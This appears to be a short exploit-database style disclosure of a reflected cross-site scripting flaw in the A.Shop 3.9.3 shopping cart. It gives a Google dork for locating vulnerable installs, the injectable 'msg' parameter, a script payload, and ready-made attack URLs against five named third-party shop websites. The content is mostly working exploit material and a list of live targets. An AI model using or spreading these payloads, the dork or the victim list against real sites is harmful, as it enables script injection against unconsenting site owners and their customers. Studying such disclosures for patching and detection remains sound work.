######################
# Exploit Title :  A.Shop 3.9.3 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://www.ashopsoftware.com/tour-dx/shopping-cart-catalog.htm
# Google Dork : inurl:"/ashop/catalogue.php?cat= "
# Date: 2016/02/12
# Version = 3.9.3
######################
# PoC:
# msg=[XSS]
# Payload = <script>alert(1);</script>
#
# http://www.coloradotrees.org/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# https://www.barmon.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.bedfordrecordings.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.ffbookstore.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.financialforuminc.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################